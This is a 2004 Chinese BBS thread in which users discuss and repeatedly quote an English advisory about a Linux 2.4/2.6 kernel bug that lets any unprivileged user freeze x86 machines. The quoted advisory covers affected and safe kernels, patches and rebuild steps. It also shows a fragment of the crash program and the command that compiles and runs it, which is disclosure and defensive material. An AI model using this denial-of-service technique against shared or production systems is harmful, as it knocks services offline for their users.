: 4. Download the patch for 2.4.26:
: 5. Apply the patch 2.4.26_i387.h_patch.txt
: * patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
: 6. Configure and compile as usual.
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: The patches should apply cleanly to other 2.4.xx versions.
: Kernel 2.4.26-rc3-gentoo
: 2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
: patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
: I have no idea why this kernel version is safe from this exploit. It just
: is. This kernel patch set returns Floating point exception instead of
: locking the system when evil is executed.
: This kernel can be used on any Linux system. It does not require any
: Gentoo-only tools.
: General advice: It is a bad idea to use kernels and patches from unknown
: sources. You should only use software from trusted sources. I know this
: patch set is safe ? you do not, and you should not take a strangers word
: when it comes to security.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
: 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2)
: aka 2.4.26_pre5:
: * wget http://re.a.la/gs (2,2M)
: 4. Unpack the 2.4.25 kernel source:
: * cd /usr/src/
: * tar xfvj linux-2.4.25.tar.bz2
: 5. Apply the Gentoo patchset:
: * patch -p1 -d /usr/src/linux-2.4.25
: <gentoo-sources-2.4.26_pre5.patch
: 6. Rename the kernel and make a symlink from /usr/src/linux:
: * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
: * ln -s linux-2.4.26-rc3-gentoo linux
: 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
: compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
: because the original Gentoo ebuild changed the version in the Makefile or
: another configuration file to make these match. Open the Makefile in your
: favorite editor and and change line 4 to say -rc3-gentoo:
: * cd linux-2.4.26-rc3-gentoo
: * nano -w Makefile
: * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
: 8. Configure your kernel
: * Using your old config: cp /usr/src/linux-oldversion/.config
: .config && make oldconfig
: * The Linux kernel can be configured with make menuconfig (CLI)
: and make xconfig (GUI)
: 9. Compile your new kernel and install as usual:
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
: 2.6.xx kernels
: A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
: 2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
: Ballarin
: It is tested successfully on Linux-2.6.7-rc2 by yours truly.
: The i387.h patch seems to be the best solution. When evil is executed it
: does not freeze the system, but unlike the other alternative patches it
: does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
: and killall.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Get a kernel from kernel.org and unpack it to /usr/src
: 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
: 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
: 5. Follow the usual steps.
: Other solutions:
: * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
: mail list available at
: o PATCH fix for Re: timer + fpu stuff locks my console race.
: o http://lkml.org/lkml/2004/6/12/88
: o Raw message: andi_kleen_patch.txt
: * Stian Skjelstad's patch also works with 2.6.7
: o http://lkml.org/lkml/2004/6/12/64
: * Sergey Vlasov has a solution at
: o http://lkml.org/lkml/2004/6/12/81
: amd64
: At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is affected as
: well. The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The
: file that needs the change is include/asm-x86_64/i387.h".
: Dan Hollis mailed this comment: Contrary to the claims on (this page),
: x86_64 is immune from this exploit -- as long as the binary is built as
: x86_64 and not ia32.
: Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
: $ file crash
: crash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for
: GNU/Linux 2.4.0,
: dynamically linked (uses shared libs), not stripped
: $ ./crash
: ...........................*....................
: [... continues for some minutes ...]
: control-c
: $
: System still up and running smoothly, zero problems. Actually even
: compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just jacks up the
: tty you run the binary in. The rest of the system runs fine. -Dan
: Fedora Core 2
: Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update
: Notification FEDORA-2004-171 2004-06-14)
: sudo yum -y update kernel*
: will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.
: Bug reports
: * The exploit was reported as gcc bug 15905 2004-06-09.
: * This is reported to the linux-kernel list with the subject timer +
: fpu stuff locks my console race.
: * Reported to Gentoo Bugzilla as bug 53804
☆ 6 ──────────── 我是分割线 ─────────────────☆
发信人: cycker (风吹不散笑容), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 15:19:29 2004
我的rh9带的gcc3.2编译的2.6.6内核也会中招
【 在 jjksam (暂别Windows) 的大作中提到: 】
: 【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: : linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
: : 需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都?
: : 受到影响. 更详细的分析和补救方法请参见:
: : http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
: : New Kernel Crash-Exploit discovered
: ...
: : This bug is confirmed to be present when the code is compiled with GCC
: : version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: : versions 2.4.2x and 2.6.x on x86 and amd64 systems.
: README中一直都说到
: COMPILING the kernel:
: - Make sure you have gcc 2.95.3 available. gcc 2.91.66 (egcs-1.1.2) may
: ~~~~~~~~要用2.95.3来编译内核
: also work but is not as safe, and *gcc 2.7.2.3 is no longer supported*.
: Also remember to upgrade your binutils package (for as/ld/nm and company)
: if necessary. For more information, refer to ./Documentation/Changes.
: 不知文中所提的出现问题的内核是用哪个编译器编译的呢?我等一会试试, 刚换了个硬盘
: 系统都重装了.
: : The Crashing Kernels
: : Minor numbers are versions verified, this is just the top the iceberg:
: : * Linux 2.6.x
: : o 2.6.7-rc2
: : o 2.6.6 (vanilla)
: : o 2.6.6-rc1 SMP (varified by blaise)
: : o 2.6.6 SMP (verified by riven)
: : o 2.6.5-gentoo (verified by RatiX)
: : o 2.6.5-mm6 - (verified by Mariux)
: : o 2.6.5 (fedora core 2 vanilla)
: : o 2.6.3-13mdk (Mandrake)
: : * Linux 2.4.2x
: : o 2.4.26 vanilla
: : o 2.4.26, grsecurity 2.0 config
: : o 2.4.26-rc1 vanilla
: : o 2.4.26-gentoo-r1
: : o 2.4.22
: : o 2.4.22-1.2188 Fedora FC1 Kernel
: : o 2.4.20 RH7.3 (gcc 2.96)
: : o 2.4.18-bf2.4 (debian woody vanilla)
: : Even grsecurity-patched kernels crash. "I would have hoped that grsec would
: : have blocked or logged something, but nothing appeared in the logs." Vincent
: : The safe kernels
: : This code does nothing but exit with the error message Floating point
: : exception and can not do any damage to systems running
: : * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
: : * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
: : * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
: : * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
: : * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
: : * 2.2.19-kernel
: : It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
: : safe. Other versions of the Gentoo kernel are not.
: : The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
: : versions of user mode Linux are safe.
: : Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
: : uses a version patched with Con Kolivas Staircase scheduler (but it only
: : affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
: : left the crash program 10 minutes and after that i killed the task and I
: : continued using my system". Guille
: : The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
: : The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
: : later.
: : The threat
: : Using this exploit to crash Linux systems requires the (ab)user to have
: : shell access or other means of uploading and running the program (like
: : cgi-bin and FTP access). The program works on any normal user account, root
: : access is not required. This exploit has been reported used to take down
: : several "lame free-shell providers" servers (running code you know will
: : damage a system intentionally and hacking in general is illegal in most
: : parts of the world and strongly discouraged).
: : This code only works on x86 Linux machines. This code does not compile
: : (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
: : doesn't affect NetBSD Stable.
: : SMP systems can be compromised, but a separate instance of the program is
: : required for each CPU before the system halts. Each instance of the program
: : code will lock one CPU and this process can not be killed. If you have two
: : CPUs the second instance of the program kills the entire machine.
: : Check your own system yourself if you are wondering if this affects you.
: : Better safe than sorry. Assume it will crash, sync (even unmount) your file
: : systems before testing. If your system is a production server with 1000 on
: : line users then do not test this code on that box.
: : How to protect yourself
: : The last days were frustrating. Compiling a large number of different
: : kernel versions just to find that gcc crash.c -o evil && ./evil halts the
: : system is quite dull. I hoped some kernels would be unaffected because
: : 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
: : versions die when evil is executed.
: : The Linux Kernel mailing list is found to the right of this article. You
: : may find solutions there not mentioned on this page. The author does
: : subscribe and plans to post (better) solutions here as they appear.
: : Patch for 2.4.2x Kernels
: : There are two patches available, both of them work with 2.4.xx kernels:
: : * 2.4.26_i387.h_patch.txt
: : * signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
: : 2.4.26_i387.h_patch.txt is recommended. This patch was committed to
: : BitKeeper by the legendary hero Linus Torvalds.
: : When this patch is applied evil will not do any damage, but it will keep
: : running at 99% CPU until it is killed (like any other process). This is a
: : general fix for root cause of the flaw evil exploits. The signal.c patch is
: : more specific to evil and makes the program exit instantly. This approach
: : works, but it is not a very beautiful solution.
: : Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26,
: : the signal.c patch is also tested with 2.4.21.
: : Follow these steps to get a safe vanilla kernel:
: : 1. Read the Kernel Rebuild Guide if this is your first time compiling
: : your own kernel
: : 2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your
: : local Linux Kernel Mirror
: : 3. Unpack the kernel source and make a symbolic link:
: : * cd /usr/src/
: : * tar xfvj linux-2.4.26.tar.bz2
: : * ln -s linux-2.4.26 linux
: : 4. Download the patch for 2.4.26:
: : 5. Apply the patch 2.4.26_i387.h_patch.txt
: : * patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
: : 6. Configure and compile as usual.
: : * make dep bzImage modules modules_install
: : * mount /boot (some distributions mount /boot on startup)
: : * cp arch/i386/boot/bzImage /boot
: : * You may want to call your new kernel something else and edit
: : Grub or Lilos configuration.
: : The patches should apply cleanly to other 2.4.xx versions.
: : Kernel 2.4.26-rc3-gentoo
: : 2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
: : patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
: : I have no idea why this kernel version is safe from this exploit. It just
: : is. This kernel patch set returns Floating point exception instead of
: : locking the system when evil is executed.
: : This kernel can be used on any Linux system. It does not require any
: : Gentoo-only tools.
: : General advice: It is a bad idea to use kernels and patches from unknown
: : sources. You should only use software from trusted sources. I know this
: : patch set is safe ? you do not, and you should not take a strangers word
: : when it comes to security.
: : 1. Read the Kernel Rebuild Guide if this is your first time compiling
: : your own kernel
: : 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
: : 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2)
: : aka 2.4.26_pre5:
: : * wget http://re.a.la/gs (2,2M)
: : 4. Unpack the 2.4.25 kernel source:
: : * cd /usr/src/
: : * tar xfvj linux-2.4.25.tar.bz2
: : 5. Apply the Gentoo patchset:
: : * patch -p1 -d /usr/src/linux-2.4.25
: : <gentoo-sources-2.4.26_pre5.patch
: : 6. Rename the kernel and make a symlink from /usr/src/linux:
: : * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
: : * ln -s linux-2.4.26-rc3-gentoo linux
: : 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
: : compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
: : because the original Gentoo ebuild changed the version in the Makefile or
: : another configuration file to make these match. Open the Makefile in your
: : favorite editor and and change line 4 to say -rc3-gentoo:
: : * cd linux-2.4.26-rc3-gentoo
: : * nano -w Makefile
: : * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
: : 8. Configure your kernel
: : * Using your old config: cp /usr/src/linux-oldversion/.config
: : .config && make oldconfig
: : * The Linux kernel can be configured with make menuconfig (CLI)
: : and make xconfig (GUI)
: : 9. Compile your new kernel and install as usual:
: : * make dep bzImage modules modules_install
: : * mount /boot (some distributions mount /boot on startup)
: : * cp arch/i386/boot/bzImage /boot
: : * You may want to call your new kernel something else and edit
: : Grub or Lilos configuration.
: : Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
: : 2.6.xx kernels
: : A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
: : 2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
: : Ballarin
: : It is tested successfully on Linux-2.6.7-rc2 by yours truly.
: : The i387.h patch seems to be the best solution. When evil is executed it
: : does not freeze the system, but unlike the other alternative patches it
: : does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
: : and killall.
: : 1. Read the Kernel Rebuild Guide if this is your first time compiling
: : your own kernel
: : 2. Get a kernel from kernel.org and unpack it to /usr/src
: : 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
: : 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
: : 5. Follow the usual steps.
: : Other solutions:
: : * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
: : mail list available at
: : o PATCH fix for Re: timer + fpu stuff locks my console race.
: : o http://lkml.org/lkml/2004/6/12/88
: : o Raw message: andi_kleen_patch.txt
: : * Stian Skjelstad's patch also works with 2.6.7
: : o http://lkml.org/lkml/2004/6/12/64
: : * Sergey Vlasov has a solution at
: : o http://lkml.org/lkml/2004/6/12/81
: : amd64
: : At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is affected as
: : well. The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The
: : file that needs the change is include/asm-x86_64/i387.h".
: : Dan Hollis mailed this comment: Contrary to the claims on (this page),
: : x86_64 is immune from this exploit -- as long as the binary is built as
: : x86_64 and not ia32.
: : Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
: : $ file crash
: : crash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for
: : GNU/Linux 2.4.0,
: : dynamically linked (uses shared libs), not stripped
: : $ ./crash
: : ...........................*....................
: : [... continues for some minutes ...]
: : control-c
: : $
: : System still up and running smoothly, zero problems. Actually even
: : compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just jacks up the
: : tty you run the binary in. The rest of the system runs fine. -Dan
: : Fedora Core 2
: : Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update
: : Notification FEDORA-2004-171 2004-06-14)
: : sudo yum -y update kernel*
: : will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.
: : Bug reports
: : * The exploit was reported as gcc bug 15905 2004-06-09.
: : * This is reported to the linux-kernel list with the subject timer +
: : fpu stuff locks my console race.
: : * Reported to Gentoo Bugzilla as bug 53804
☆ 7 ──────────── 我是分割线 ─────────────────☆
发信人: jjksam (暂别Windows), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 15:57:10 2004
内核的文档中对用其他gcc编译出来的没有什么保证.
就算是2.95.3,也只是说测试得比较多,也没有什么保证.
【 在 cycker (风吹不散笑容) 的大作中提到: 】
: 我的rh9带的gcc3.2编译的2.6.6内核也会中招
: 【 在 jjksam (暂别Windows) 的大作中提到: 】
: : ...
: : README中一直都说到
: : COMPILING the kernel:
: : - Make sure you have gcc 2.95.3 available. gcc 2.91.66 (egcs-1.1.2) may
: : ~~~~~~~~要用2.95.3来编译内核
: : also work but is not as safe, and *gcc 2.7.2.3 is no longer supported*.
: : Also remember to upgrade your binutils package (for as/ld/nm and company)
: : if necessary. For more information, refer to ./Documentation/Changes.
: : 不知文中所提的出现问题的内核是用哪个编译器编译的呢?我等一会试试, 刚换了个硬?
: : 系统都重装了.
☆ 8 ──────────── 我是分割线 ─────────────────☆
发信人: cycker (风吹不散笑容), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 16:00:59 2004
哦,看错了,还以为是只有2.95.3的才会有问题,原来刚好相反
【 在 jjksam (暂别Windows) 的大作中提到: 】
: 内核的文档中对用其他gcc编译出来的没有什么保证.
: 就算是2.95.3,也只是说测试得比较多,也没有什么保证.
: 【 在 cycker (风吹不散笑容) 的大作中提到: 】
: : 我的rh9带的gcc3.2编译的2.6.6内核也会中招
☆ 9 ──────────── 我是分割线 ─────────────────☆
发信人: jjksam (暂别Windows), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 18:59:40 2004
【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: while(1)
: write(1, ".", 1);
: return 0;
: }
: This bug is confirmed to be present when the code is compiled with GCC
: version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: versions 2.4.2x and 2.6.x on x86 and amd64 systems.
GCC version 2.95.3也有同样的问题
: The Crashing Kernels
: Minor numbers are versions verified, this is just the top the iceberg:
: * Linux 2.6.x
: o 2.6.7-rc2
: o 2.6.6 (vanilla)
: o 2.6.6-rc1 SMP (varified by blaise)
: o 2.6.6 SMP (verified by riven)
: o 2.6.5-gentoo (verified by RatiX)
: o 2.6.5-mm6 - (verified by Mariux)
: o 2.6.5 (fedora core 2 vanilla)
: o 2.6.3-13mdk (Mandrake)
: * Linux 2.4.2x
: o 2.4.26 vanilla
: o 2.4.26, grsecurity 2.0 config
: o 2.4.26-rc1 vanilla
: o 2.4.26-gentoo-r1
: o 2.4.22
: o 2.4.22-1.2188 Fedora FC1 Kernel
: o 2.4.20 RH7.3 (gcc 2.96)
: o 2.4.18-bf2.4 (debian woody vanilla)
: Even grsecurity-patched kernels crash. "I would have hoped that grsec would
: have blocked or logged something, but nothing appeared in the logs." Vincent
: The safe kernels
: This code does nothing but exit with the error message Floating point
: exception and can not do any damage to systems running
: * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
: * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
: * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
: * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
: * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
: * 2.2.19-kernel
: It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
: safe. Other versions of the Gentoo kernel are not.
: The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
: versions of user mode Linux are safe.
: Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
: uses a version patched with Con Kolivas Staircase scheduler (but it only
: affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
: left the crash program 10 minutes and after that i killed the task and I
: continued using my system". Guille
: The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
: The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
: later.
: The threat
: Using this exploit to crash Linux systems requires the (ab)user to have
: shell access or other means of uploading and running the program (like
: cgi-bin and FTP access). The program works on any normal user account, root
: access is not required. This exploit has been reported used to take down
: several "lame free-shell providers" servers (running code you know will
: damage a system intentionally and hacking in general is illegal in most
: parts of the world and strongly discouraged).
: This code only works on x86 Linux machines. This code does not compile
: (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
: doesn't affect NetBSD Stable.
: SMP systems can be compromised, but a separate instance of the program is
: required for each CPU before the system halts. Each instance of the program
: code will lock one CPU and this process can not be killed. If you have two
: CPUs the second instance of the program kills the entire machine.
: Check your own system yourself if you are wondering if this affects you.
: Better safe than sorry. Assume it will crash, sync (even unmount) your file
: systems before testing. If your system is a production server with 1000 on
: line users then do not test this code on that box.
: How to protect yourself
: The last days were frustrating. Compiling a large number of different
: kernel versions just to find that gcc crash.c -o evil && ./evil halts the
: system is quite dull. I hoped some kernels would be unaffected because
: 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
: versions die when evil is executed.
: The Linux Kernel mailing list is found to the right of this article. You
: may find solutions there not mentioned on this page. The author does
: subscribe and plans to post (better) solutions here as they appear.
: Patch for 2.4.2x Kernels
: There are two patches available, both of them work with 2.4.xx kernels:
: * 2.4.26_i387.h_patch.txt
: * signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
: 2.4.26_i387.h_patch.txt is recommended. This patch was committed to
: BitKeeper by the legendary hero Linus Torvalds.
: When this patch is applied evil will not do any damage, but it will keep
: running at 99% CPU until it is killed (like any other process). This is a
: general fix for root cause of the flaw evil exploits. The signal.c patch is
: more specific to evil and makes the program exit instantly. This approach
: works, but it is not a very beautiful solution.
: Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26,
: the signal.c patch is also tested with 2.4.21.
: Follow these steps to get a safe vanilla kernel:
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your
: local Linux Kernel Mirror
: 3. Unpack the kernel source and make a symbolic link:
: * cd /usr/src/
: * tar xfvj linux-2.4.26.tar.bz2
: * ln -s linux-2.4.26 linux
: 4. Download the patch for 2.4.26:
: 5. Apply the patch 2.4.26_i387.h_patch.txt
: * patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
: 6. Configure and compile as usual.
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: The patches should apply cleanly to other 2.4.xx versions.
: Kernel 2.4.26-rc3-gentoo
: 2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
: patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
: I have no idea why this kernel version is safe from this exploit. It just
: is. This kernel patch set returns Floating point exception instead of
: locking the system when evil is executed.
: This kernel can be used on any Linux system. It does not require any
: Gentoo-only tools.
: General advice: It is a bad idea to use kernels and patches from unknown
: sources. You should only use software from trusted sources. I know this
: patch set is safe ? you do not, and you should not take a strangers word
: when it comes to security.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
: 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2)
: aka 2.4.26_pre5:
: * wget http://re.a.la/gs (2,2M)
: 4. Unpack the 2.4.25 kernel source:
: * cd /usr/src/
: * tar xfvj linux-2.4.25.tar.bz2
: 5. Apply the Gentoo patchset:
: * patch -p1 -d /usr/src/linux-2.4.25
: <gentoo-sources-2.4.26_pre5.patch
: 6. Rename the kernel and make a symlink from /usr/src/linux:
: * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
: * ln -s linux-2.4.26-rc3-gentoo linux
: 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
: compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
: because the original Gentoo ebuild changed the version in the Makefile or
: another configuration file to make these match. Open the Makefile in your
: favorite editor and and change line 4 to say -rc3-gentoo:
: * cd linux-2.4.26-rc3-gentoo
: * nano -w Makefile
: * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
: 8. Configure your kernel
: * Using your old config: cp /usr/src/linux-oldversion/.config
: .config && make oldconfig
: * The Linux kernel can be configured with make menuconfig (CLI)
: and make xconfig (GUI)
: 9. Compile your new kernel and install as usual:
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
: 2.6.xx kernels
: A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
: 2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
: Ballarin
: It is tested successfully on Linux-2.6.7-rc2 by yours truly.
: The i387.h patch seems to be the best solution. When evil is executed it
: does not freeze the system, but unlike the other alternative patches it
: does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
: and killall.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Get a kernel from kernel.org and unpack it to /usr/src
: 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
: 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
: 5. Follow the usual steps.
: Other solutions:
: * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
: mail list available at
: o PATCH fix for Re: timer + fpu stuff locks my console race.
: o http://lkml.org/lkml/2004/6/12/88
: o Raw message: andi_kleen_patch.txt
: * Stian Skjelstad's patch also works with 2.6.7
: o http://lkml.org/lkml/2004/6/12/64
: * Sergey Vlasov has a solution at
: o http://lkml.org/lkml/2004/6/12/81
: amd64
: At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is affected as
: well. The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The
: file that needs the change is include/asm-x86_64/i387.h".
: Dan Hollis mailed this comment: Contrary to the claims on (this page),
: x86_64 is immune from this exploit -- as long as the binary is built as
: x86_64 and not ia32.
: Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
: $ file crash
: crash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for
: GNU/Linux 2.4.0,
: dynamically linked (uses shared libs), not stripped
: $ ./crash
: ...........................*....................
: [... continues for some minutes ...]
: control-c
: $
: System still up and running smoothly, zero problems. Actually even
: compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just jacks up the
: tty you run the binary in. The rest of the system runs fine. -Dan
: Fedora Core 2
: Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update
: Notification FEDORA-2004-171 2004-06-14)
: sudo yum -y update kernel*
: will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.
: Bug reports
: * The exploit was reported as gcc bug 15905 2004-06-09.
: * This is reported to the linux-kernel list with the subject timer +
: fpu stuff locks my console race.
: * Reported to Gentoo Bugzilla as bug 53804
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店